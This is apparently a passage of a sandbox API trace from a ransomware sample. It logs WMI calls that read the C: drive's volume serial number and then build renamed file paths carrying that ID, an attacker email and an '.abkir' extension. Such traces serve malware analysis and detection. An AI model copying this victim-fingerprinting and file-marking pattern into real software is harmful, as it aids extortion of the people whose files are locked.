0x0 [0176.951] WbemDefPath:IUnknown:AddRef (This=0x60306a0) returned 0x3 [0176.951] WbemDefPath:IUnknown:Release (This=0x60306a0) returned 0x2 [0176.951] WbemDefPath:IWbemPath:SetText (This=0x60306a0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0176.951] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60306a0, puCount=0x949ea3c | out: puCount=0x949ea3c*=0x0) returned 0x0 [0176.951] WbemDefPath:IWbemPath:GetText (in: This=0x60306a0, lFlags=2, puBuffLength=0x949ea38*=0x0, pszText=0x0 | out: puBuffLength=0x949ea38*=0x20, pszText=0x0) returned 0x0 [0176.951] WbemDefPath:IWbemPath:GetText (in: This=0x60306a0, lFlags=2, puBuffLength=0x949ea38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0176.951] WbemDefPath:IWbemPath:GetInfo (in: This=0x60306a0, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0176.951] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60306a0, puCount=0x949ea3c | out: puCount=0x949ea3c*=0x0) returned 0x0 [0176.951] WbemDefPath:IWbemPath:GetInfo (in: This=0x60306a0, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0176.951] WbemDefPath:IWbemPath:GetInfo (in: This=0x60306a0, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0176.951] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60306a0, puCount=0x949e9bc | out: puCount=0x949e9bc*=0x0) returned 0x0 [0176.952] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e9a8 | out: puCount=0x949e9a8*=0x2) returned 0x0 [0176.952] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9a4*=0x0, pszText=0x0 | out: puBuffLength=0x949e9a4*=0xf, pszText=0x0) returned 0x0 [0176.952] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9a4*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9a4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0176.952] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e958 | out: ppv=0x949e958*=0xb51e34) returned 0x0 [0176.952] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e950 | out: pAptType=0x949e950*=1) returned 0x0 [0176.952] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e954 | out: ppvObject=0x949e954*=0x0) returned 0x80004002 [0176.952] IUnknown:Release (This=0xb51e34) returned 0x1 [0176.953] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e2c0 | out: ppv=0x949e2c0*=0x60276a0) returned 0x0 [0176.953] WbemDefPath:IUnknown:QueryInterface (in: This=0x60276a0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e4d8 | out: ppvObject=0x949e4d8*=0x0) returned 0x80004002 [0176.953] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60276a0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e4ec | out: ppvObject=0x949e4ec*=0x6030710) returned 0x0 [0176.953] WbemDefPath:IUnknown:Release (This=0x60276a0) returned 0x0 [0176.953] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030710, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e10c | out: ppvObject=0x949e10c*=0x6030710) returned 0x0 [0176.953] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030710, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e0c8 | out: ppvObject=0x949e0c8*=0x0) returned 0x80004002 [0176.953] WbemDefPath:IUnknown:AddRef (This=0x6030710) returned 0x3 [0176.954] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030710, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949da24 | out: ppvObject=0x949da24*=0x0) returned 0x80004002 [0176.954] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030710, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d9d4 | out: ppvObject=0x949d9d4*=0x0) returned 0x80004002 [0176.954] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030710, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d9e0 | out: ppvObject=0x949d9e0*=0x66ccab8) returned 0x0 [0176.954] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccab8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d9e8 | out: pCid=0x949d9e8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0176.954] WbemDefPath:IUnknown:Release (This=0x66ccab8) returned 0x3 [0176.954] CoGetContextToken (in: pToken=0x949da40 | out: pToken=0x949da40) returned 0x0 [0176.954] CoGetContextToken (in: pToken=0x949de48 | out: pToken=0x949de48) returned 0x0 [0176.954] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030710, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949ded8 | out: ppvObject=0x949ded8*=0x0) returned 0x80004002 [0176.954] WbemDefPath:IUnknown:Release (This=0x6030710) returned 0x2 [0176.954] WbemDefPath:IUnknown:Release (This=0x6030710) returned 0x1 [0176.954] CoGetContextToken (in: pToken=0x949e7d0 | out: pToken=0x949e7d0) returned 0x0 [0176.954] CoGetContextToken (in: pToken=0x949e730 | out: pToken=0x949e730) returned 0x0 [0176.954] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030710, riid=0x949e800*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e7fc | out: ppvObject=0x949e7fc*=0x6030710) returned 0x0 [0176.954] WbemDefPath:IUnknown:AddRef (This=0x6030710) returned 0x3 [0176.954] WbemDefPath:IUnknown:Release (This=0x6030710) returned 0x2 [0176.954] WbemDefPath:IWbemPath:SetText (This=0x6030710, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0176.954] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030710, puCount=0x949e980 | out: puCount=0x949e980*=0x2) returned 0x0 [0176.954] WbemDefPath:IWbemPath:GetText (in: This=0x6030710, lFlags=4, puBuffLength=0x949e97c*=0x0, pszText=0x0 | out: puBuffLength=0x949e97c*=0xf, pszText=0x0) returned 0x0 [0176.954] WbemDefPath:IWbemPath:GetText (in: This=0x6030710, lFlags=4, puBuffLength=0x949e97c*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e97c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0176.954] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e980 | out: ppv=0x949e980*=0xb51e34) returned 0x0 [0176.955] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e978 | out: pAptType=0x949e978*=1) returned 0x0 [0176.955] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e97c | out: ppvObject=0x949e97c*=0x0) returned 0x80004002 [0176.955] IUnknown:Release (This=0xb51e34) returned 0x1 [0176.955] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e5a0 | out: ppv=0x949e5a0*=0x6023e28) returned 0x0 [0176.955] WbemLocator:IUnknown:QueryInterface (in: This=0x6023e28, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e7b8 | out: ppvObject=0x949e7b8*=0x0) returned 0x80004002 [0176.956] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023e28, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e7cc | out: ppvObject=0x949e7cc*=0x6027760) returned 0x0 [0176.956] WbemLocator:IUnknown:Release (This=0x6023e28) returned 0x0 [0176.956] WbemLocator:IUnknown:QueryInterface (in: This=0x6027760, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e3ec | out: ppvObject=0x949e3ec*=0x6027760) returned 0x0 [0176.956] WbemLocator:IUnknown:QueryInterface (in: This=0x6027760, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e3a8 | out: ppvObject=0x949e3a8*=0x0) returned 0x80004002 [0176.956] WbemLocator:IUnknown:AddRef (This=0x6027760) returned 0x3 [0176.956] WbemLocator:IUnknown:QueryInterface (in: This=0x6027760, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dd04 | out: ppvObject=0x949dd04*=0x0) returned 0x80004002 [0176.956] WbemLocator:IUnknown:QueryInterface (in: This=0x6027760, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dcb4 | out: ppvObject=0x949dcb4*=0x0) returned 0x80004002 [0176.956] WbemLocator:IUnknown:QueryInterface (in: This=0x6027760, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dcc0 | out: ppvObject=0x949dcc0*=0x0) returned 0x80004002 [0176.956] CoGetContextToken (in: pToken=0x949dd20 | out: pToken=0x949dd20) returned 0x0 [0176.956] CoGetContextToken (in: pToken=0x949e128 | out: pToken=0x949e128) returned 0x0 [0176.956] WbemLocator:IUnknown:QueryInterface (in: This=0x6027760, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1b8 | out: ppvObject=0x949e1b8*=0x0) returned 0x80004002 [0176.956] WbemLocator:IUnknown:Release (This=0x6027760) returned 0x2 [0176.956] WbemLocator:IUnknown:Release (This=0x6027760) returned 0x1 [0176.956] CoGetContextToken (in: pToken=0x949e798 | out: pToken=0x949e798) returned 0x0 [0176.956] CoGetContextToken (in: pToken=0x949e6f8 | out: pToken=0x949e6f8) returned 0x0 [0176.956] WbemLocator:IUnknown:QueryInterface (in: This=0x6027760, riid=0x949e7c8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e7c4 | out: ppvObject=0x949e7c4*=0x6027760) returned 0x0 [0176.956] WbemLocator:IUnknown:AddRef (This=0x6027760) returned 0x3 [0176.957] WbemLocator:IUnknown:Release (This=0x6027760) returned 0x2 [0176.957] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030710, puCount=0x949e95c | out: puCount=0x949e95c*=0x2) returned 0x0 [0176.957] WbemDefPath:IWbemPath:GetText (in: This=0x6030710, lFlags=8, puBuffLength=0x949e958*=0x0, pszText=0x0 | out: puBuffLength=0x949e958*=0xf, pszText=0x0) returned 0x0 [0176.957] WbemDefPath:IWbemPath:GetText (in: This=0x6030710, lFlags=8, puBuffLength=0x949e958*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e958*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0176.957] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e834 | out: ppv=0x949e834*=0x6027770) returned 0x0 [0176.957] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027770, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e8c8 | out: ppNamespace=0x949e8c8*=0x6033374) returned 0x0 [0177.521] WbemLocator:IUnknown:QueryInterface (in: This=0x6033374, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e764 | out: ppvObject=0x949e764*=0xb5ba94) returned 0x0 [0177.521] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5ba94, pProxy=0x6033374, pAuthnSvc=0x949e7b4, pAuthzSvc=0x949e7b0, pServerPrincName=0x949e7a8, pAuthnLevel=0x949e7ac, pImpLevel=0x949e79c, pAuthInfo=0x949e7a0, pCapabilites=0x949e7a4 | out: pAuthnSvc=0x949e7b4*=0xa, pAuthzSvc=0x949e7b0*=0x0, pServerPrincName=0x949e7a8, pAuthnLevel=0x949e7ac*=0x6, pImpLevel=0x949e79c*=0x2, pAuthInfo=0x949e7a0, pCapabilites=0x949e7a4*=0x1) returned 0x0 [0177.521] WbemLocator:IUnknown:Release (This=0xb5ba94) returned 0x1 [0177.521] WbemLocator:IUnknown:QueryInterface (in: This=0x6033374, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e758 | out: ppvObject=0x949e758*=0xb5bab4) returned 0x0 [0177.521] WbemLocator:IUnknown:QueryInterface (in: This=0x6033374, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e754 | out: ppvObject=0x949e754*=0xb5ba94) returned 0x0 [0177.521] WbemLocator:IClientSecurity:SetBlanket (This=0xb5ba94, pProxy=0x6033374, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0177.521] WbemLocator:IUnknown:Release (This=0xb5ba94) returned 0x2 [0177.522] WbemLocator:IUnknown:Release (This=0xb5bab4) returned 0x1 [0177.522] CoTaskMemFree (pv=0xbd4a38) [0177.522] WbemLocator:IUnknown:Release (This=0x6027770) returned 0x0 [0177.522] WbemLocator:IUnknown:QueryInterface (in: This=0x6033374, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e354 | out: ppvObject=0x949e354*=0xb5bab4) returned 0x0 [0177.522] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bab4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e310 | out: ppvObject=0x949e310*=0x0) returned 0x80004002 [0177.522] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bab4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e12c | out: ppvObject=0x949e12c*=0x0) returned 0x80004002 [0177.522] WbemLocator:IUnknown:AddRef (This=0xb5bab4) returned 0x3 [0177.523] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bab4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dc6c | out: ppvObject=0x949dc6c*=0x0) returned 0x80004002 [0177.523] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bab4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dc1c | out: ppvObject=0x949dc1c*=0x0) returned 0x80004002 [0177.523] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bab4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dc28 | out: ppvObject=0x949dc28*=0xb5ba14) returned 0x0 [0177.523] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5ba14, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949dc30 | out: pCid=0x949dc30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0177.523] WbemLocator:IUnknown:Release (This=0xb5ba14) returned 0x3 [0177.523] CoGetContextToken (in: pToken=0x949dc88 | out: pToken=0x949dc88) returned 0x0 [0177.523] CoGetContextToken (in: pToken=0x949e090 | out: pToken=0x949e090) returned 0x0 [0177.523] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bab4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e120 | out: ppvObject=0x949e120*=0xb5ba9c) returned 0x0 [0177.523] WbemLocator:IRpcOptions:Query (in: This=0xb5ba9c, pPrx=0xb5bab4, dwProperty=2, pdwValue=0x949e148 | out: pdwValue=0x949e148) returned 0x80004002 [0177.523] WbemLocator:IUnknown:Release (This=0xb5ba9c) returned 0x3 [0177.523] WbemLocator:IUnknown:Release (This=0xb5bab4) returned 0x2 [0177.523] CoGetContextToken (in: pToken=0x949e668 | out: pToken=0x949e668) returned 0x0 [0177.523] CoGetContextToken (in: pToken=0x949e5c8 | out: pToken=0x949e5c8) returned 0x0 [0177.524] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bab4, riid=0x949e698*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e694 | out: ppvObject=0x949e694*=0x6033374) returned 0x0 [0177.524] WbemLocator:IUnknown:AddRef (This=0x6033374) returned 0x4 [0177.524] WbemLocator:IUnknown:Release (This=0x6033374) returned 0x3 [0177.524] WbemLocator:IUnknown:Release (This=0x6033374) returned 0x2 [0177.524] SysStringLen (param_1=0x0) returned 0x0 [0177.524] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60306a0, puCount=0x949ea2c | out: puCount=0x949ea2c*=0x0) returned 0x0 [0177.524] WbemDefPath:IWbemPath:GetText (in: This=0x60306a0, lFlags=2, puBuffLength=0x949ea28*=0x0, pszText=0x0 | out: puBuffLength=0x949ea28*=0x20, pszText=0x0) returned 0x0 [0177.524] WbemDefPath:IWbemPath:GetText (in: This=0x60306a0, lFlags=2, puBuffLength=0x949ea28*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea28*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0177.524] CoGetContextToken (in: pToken=0x949e698 | out: pToken=0x949e698) returned 0x0 [0177.524] WbemLocator:IUnknown:AddRef (This=0xb5bab4) returned 0x3 [0177.524] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bab4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e52c | out: ppvObject=0x949e52c*=0xb5bab4) returned 0x0 [0177.524] WbemLocator:IUnknown:Release (This=0xb5bab4) returned 0x3 [0177.524] WbemLocator:IUnknown:Release (This=0xb5bab4) returned 0x2 [0177.524] WbemDefPath:IWbemPath:GetText (in: This=0x60306a0, lFlags=2, puBuffLength=0x949ea30*=0x0, pszText=0x0 | out: puBuffLength=0x949ea30*=0x20, pszText=0x0) returned 0x0 [0177.524] WbemDefPath:IWbemPath:GetText (in: This=0x60306a0, lFlags=2, puBuffLength=0x949ea30*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea30*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0177.524] IWbemServices:GetObject (in: This=0x6033374, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949e9e4*=0x0, ppCallResult=0x0 | out: ppObject=0x949e9e4*=0x6028648, ppCallResult=0x0) returned 0x0 [0178.700] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030710, puCount=0x949e9e4 | out: puCount=0x949e9e4*=0x2) returned 0x0 [0178.700] WbemDefPath:IWbemPath:GetText (in: This=0x6030710, lFlags=4, puBuffLength=0x949e9e0*=0x0, pszText=0x0 | out: puBuffLength=0x949e9e0*=0xf, pszText=0x0) returned 0x0 [0178.700] WbemDefPath:IWbemPath:GetText (in: This=0x6030710, lFlags=4, puBuffLength=0x949e9e0*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9e0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0178.700] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e9e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x369f6d0*=0, plFlavor=0x369f6d4*=0 | out: pVal=0x949e9e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x369f6d0*=8, plFlavor=0x369f6d4*=0) returned 0x0 [0178.700] SysStringByteLen (bstr="9C354B42") returned 0x10 [0178.700] SysStringByteLen (bstr="9C354B42") returned 0x10 [0178.701] IWbemClassObject:Get (in: This=0x6028648, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e9e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x369f6d0*=8, plFlavor=0x369f6d4*=0 | out: pVal=0x949e9e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x369f6d0*=8, plFlavor=0x369f6d4*=0) returned 0x0 [0178.701] SysStringByteLen (bstr="9C354B42") returned 0x10 [0178.701] SysStringByteLen (bstr="9C354B42") returned 0x10 [0178.701] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", nBufferLength=0x105, lpBuffer=0x949e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", lpFilePart=0x0) returned 0x9d [0178.701] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0xc0 [0178.701] SetThreadErrorMode 